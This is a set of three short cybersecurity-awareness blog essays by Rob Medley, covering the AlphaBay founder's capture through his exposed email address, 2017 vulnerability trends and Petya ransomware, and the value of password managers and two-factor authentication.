procedures – Rob Medley

Hacking the Irony

By Rob Medley

AlphaBay founder Alexandre Cazes had a bad week. Business on his Dark Web version of eBay was making the Canadian lots of money, literally hand over fist. He didn’t need to worry about the police, his service operated via anonymizing methods such as Tor and I2P. Things were really looking up, until the man found himself in a dank Bangkok jail. It seems, in a veritable twist of irony, that Cazes had fallen victim to the same hacking techniques as millions of individuals and businesses face each day.

“You will never find a more wretched hive of scum and villainy. We must be cautious”

AlphaBay, like Mos Eisley Spaceport in the Star Wars saga, was a bazaar of digital dubiousness. Anything and everything could be found there, from drugs, to arms, to hacking tools with extensive instructions and even customer support. It was a thriving bastion of Capitalism dedicated to the underworld. Unfortunately, the 1% were not getting their cut, so it had to be taken down. The beginning of the end happened simply enough. Police had acquired Cazes’ email address ‘Pimp_alex_91@hotmail.com’ way back in 2014 while monitoring the site. In a fait accompli, Cazes had somehow added his personal email to the new user welcome message; a good thing for legitimate CEO’s, showing that they care, but not so much for something that could land you in a Thai jail.

“Treachery has existed as long as there’s been warfare, and there’s always been a few people that you couldn’t trust.”

General James Mattis, the stalwart symbol of American military prowess, follows the eastern philosophy which teaches knowledge as the key to defeat an enemy. By the same token, any hacker worth his salt can break into a network with just a single piece of information, like an email address. Conducting reconnaissance using the address can reveal social media and financial accounts, domain registration data, and daisy-chain contacts associated with the email. The exploitation process after this can be as easy as sending a compromised link in a phishing email from one of the targets friends, placing malicious code on a site the target is most likely to visit, to planting a rootkit.

“Once you’ve lost your privacy, you realize you’ve lost an extremely valuable thing.”

Billy Graham, the champion of cable TV Christianity, has a net worth of $25 Million. Alexandre Cazes’ net worth, by contrast, was about the same, coming in at $23 Million. When police launched operation ‘Bayonet’, they basically followed the trail from Cazes’ compromised email address to his PayPal account and a front company, EBX Technologies. Eventually, this led them to Cazes himself in Bangkok, Thailand. A raid on the swashbuckling entrepreneurs house procured the laptop Cazes used to run AlphaBay, which was unencrypted and logged into the AlphaBay site at the time of its seizure. The lesson here? Encrypt your hard drive and traffic. Also, have an extremely short inactivity lockout, especially if you are on the wrong side of the law.

“Have no fear of perfection – you’ll never reach it.”

Salvador Dali, mustachioed master of Surrealism, knew that perfection can never be achieved; the same is true in security. Navigating the digital world around us takes caution and a hefty amount of risk acceptance or mitigation. It was not some grand marvel of network subversion that took down AlphaBay, but human carelessness. It is an ironic cautionary tale that those on the wrong side of the light, legally speaking, are just as susceptible to hacking as we are in bountiful lands of the mapped Internet. Basic awareness and caution should be globally embraced by anyone engaged in digital activities, because all it takes, is an email address.

2017 Cybersecurity Vulnerability Trends

Looking at the state of Cybersecurity by news headlines, one would logically assume that ransomware is all security professionals must worry about in their day-to-day operations. The nemesis of the moment is Petya. Petya is a ransomware variant that is built on the chassis of a leaked National Security Agency exploit called Eternal Blue. The ransomware looks for unpatched Windows machines of all flavors running SMB 1.0.SMB stands for Server Message Block It’s an outmoded application layer file-sharing protocol that has been superseded by Active Directory and later versions of SMB. Petya encrypts your Master Boot Record, so that you can’t do anything while it works to encrypt the rest of your files. The result? You can either pay $300 in Bitcoin to some shadowy Russian hacking group and maybe get a decryption key for your files, or turn off SMB 1.0. To turn off SMB, you’ll need to navigate to your windows features setting, uncheck the offending service, and reboot.

But Ransomware isn’t the nightmare that should keep security professionals up at night. Indeed, a good backup policy mitigates any lapses in patch management. What should keep us up at night is our own state of being human. As humans, we are imperfect creatures. As much as we strive for greatness, there is always that one thing we might not have accomplished while juggling the many tasks of our daily rituals. Statistically, the vulnerabilities we see reflect the state of our profession.

Per the National Institute of Standards and Technology (NIST) National Vulnerability Database (NVD), the greatest threat of 2017 isn’t Ransomware, it’s buffer-errors, followed by improper access controls, information leaks / disclosure, cross-site scripting, and permission, privileges and access control weaknesses.

Buffer-overflows? Okay, I get it. The development world is complex, and errors are going to happen. One of the beauties of our human condition is that we can always find better ways to do things, or, on the malevolent side, ways to exploit things. Luckily, protections against buffer-overflows are evolving using safe libraries, stack and executable containment strategies.

Cross-site scripting (XSS) has been on the security radar for a while now, yet it has declined from its height of 14.3% of all vulnerabilities in 2009, to its current 9.2%. XSS is a legitimate attack vector, and its decline in prevalence shows that developers and admins have been waging an effective battle against the threat. The industry focus on web threats has led to some interesting countermeasures, including containerization (essentially running a browser in its own virtual machine), JavaScript sandboxing, and Content Security Policies (CSP); all leading to effective mitigation of the threat.

What should give security folks pause, is the rise in threats that stab at the very heart of our job description. Ensuring the confidentiality, integrity, and availability of information resources is what we do for a living. On a personal level, each of us should take offense that vulnerabilities exploiting access controls, permissions, and privileges even exist, let alone rank among the top threats to our networks. To be sure, buffer-overflows can lead to escalation of privilege, but we must not assume that security faults in controls and privileges are solely the result of software weaknesses. Certainly, NIST doesn’t take this approach as they have made buffer-overflows its own category, separate from access and privilege threats.

So, what do we do? First and foremost, we should let go of our ego. Don’t assume that every security detail has been taken care of. Get in the habit of double-checking yourself, make sure those privileges and controls are properly set, and most important, still relevant. If security needs are not being met, double-down on ensuring your settings are up to date. Use those checklists, validate your templates, and adopt habits that put security first.

Let’s make it a community goal to not see security essentials on the NVD vulnerability trends for 2018.

The Power of Two-Factor Authentication

By Rob Medley
June 11, 2016

With the news of numerous hacks in the last few weeks, it’s not far-fetched to propose that people are worried. Not only is the individual user concerned about theft of personal information and password databases from the likes of Myspace, LinkedIn, Twitter, and the Office of Personnel Management, but business owners, particularly small business owners, are increasingly becoming the victims of hackers.

While it’s become a joke for large corporations to apologize to consumers, hand out 12 months of nearly worthless identity theft protection, then hide behind a phalanx of lawyers, small business owners do not have that luxury. In a recent survey, the Federation of Small Businesses (FSB) reported that 93% of small business owners have some type of cybersecurity initiatives in place[i]. 93% is a good start. Where it becomes troublesome is that two-thirds of these same businesses surveyed have been victims of cyber-crime in the last two years. Two-thirds! Adding the seven percent that is blissfully unaware of the dangerous online environment surrounding them, that’s seven out of every ten business owners being victimized; the rest are just lucky.

At the heart of what we are talking about is basic security hygiene. There are plenty of simple things netizens and businesses can do, yet choose not to, because they are focused on other things, such as meeting production, revenue and other business goals. The security world is still dealing with easily guessed passwords after 30+ years of telling people not to use them. If you look at the news surrounding the LinkedIn and Twitter hacks, the same supremely weak passwords are still showing up, ‘123456’, ‘password’, ‘Redskins’, etc. Some think they are being smarter than the hacker by using number substitution, e.g. ‘10v3’ instead of ‘Love’. Believe me when I say these are just as weak; common automated hacking programs run these variations by default. Indeed there is no truly secure password, but by combining random alphanumeric and special characters, you’ll increase the time to hack the password – meaning you are no longer the low-hanging fruit. The problem? These complex passwords are no longer easy to remember, so they are written down; totally defeating the purpose of the endeavor.

Enter password managers and two-factor authentication. This rock-star duo can make your life much less complicated. By using a password manager such as Last Pass or Dashlane, you can store and sync all of your passwords online. Highly dangerous you say? Dashlane for example prompts you to create a master password, one that if you forget it, you’ll lose access to your account. Since the company uses very strong encryption, and doesn’t have access to your information, neither do hackers. Why? Often the weak point of business architecture is some procedural vulnerability that allows the hacker to access your hashed or (God forbid) data stored in the clear on the company servers. You can also enable text message authentication via mobile phone or access via a smart key, such as Yubi-key. These secondary authentication measures prove much more difficult to circumvent as you are combining something you know with something you have.

A cautionary note on using your mobile number as a second factor of authentication, please log in or call your service provider and add a pin requirement or text message notification of any attempts to change that account information. If you leave it at just a password, a hacker can gain access to your privacy data (name, date of birth, address, social security number, etc.) from other sources, e.g. LinkedIn, Twitter, Facebook, and hijack your phone number. If successful, a hacker can work around the cell phone as a second form of identity verification.

Hackers are very smart people. I respect their knowledge and dedication. However, they are often able to achieve success because of a lapse in policy, procedure, or basic security hygiene principle on the part of the individual or business. While large corporations can absorb the damage and loss of reputation from a breach, the small business and individual cannot. Paying attention to topics such as governance and policy can help save the business heartache down the road. As a business or even an individual, if you are too busy to focus on these areas, people like me are at your disposal. Reaching out to a consultant that can help you overcome these obstacles can save time, money, and reputation down the road.

Rob Medley operates Policy Assured, LLC – a veteran-owned information assurance company.

[i] Small businesses bearing the brunt of cyber-crime. (2016, June 10). Retrieved June 11, 2016, from http://www.fsb.org.uk/media-centre/latest-news/2016/06/10/small-businesses-bearing-the-brunt-of-cyber-crime